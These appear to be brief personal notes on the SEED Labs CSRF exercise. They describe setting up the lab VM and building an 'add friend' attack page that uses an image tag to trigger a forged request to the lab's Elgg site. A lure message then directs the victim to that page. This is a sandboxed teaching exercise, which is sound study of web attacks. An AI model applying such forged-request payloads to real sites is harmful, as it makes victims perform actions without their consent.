seed lab - web security 1 - csrf lab
1. Lab Setup
1.1 Download seedlab ubuntu16 SEEDUbuntu-16.04-32bit.zip, from mediafire link, via XunLei, fast speed. Extract zip file.
1.2 Create virtualbox VM, select the extracted SEEDUbuntu-16.04-32bit.vmdk file. Run VM.
2. CSRF Attack - add friend
2.1 Run firefox, visit www.csrflabelgg.com. Because /etc/hosts include “127.0.0.1 www.csrfelgg.com”, so it doesn’t route outside the VM.
2.2 Login as Samy/seedsamy. Vim “addfriend.html”,
src= “http://www.csrflabelgg.com/action/friends/add?friend=45” //samy=45
alt=“image” width=“100” height=“100” />
$ cp addfriend.html /var/www/CSRF/Attacker/index.html
In Elgg, Samy send Alice a message with the url: www.csrflabattacker.com.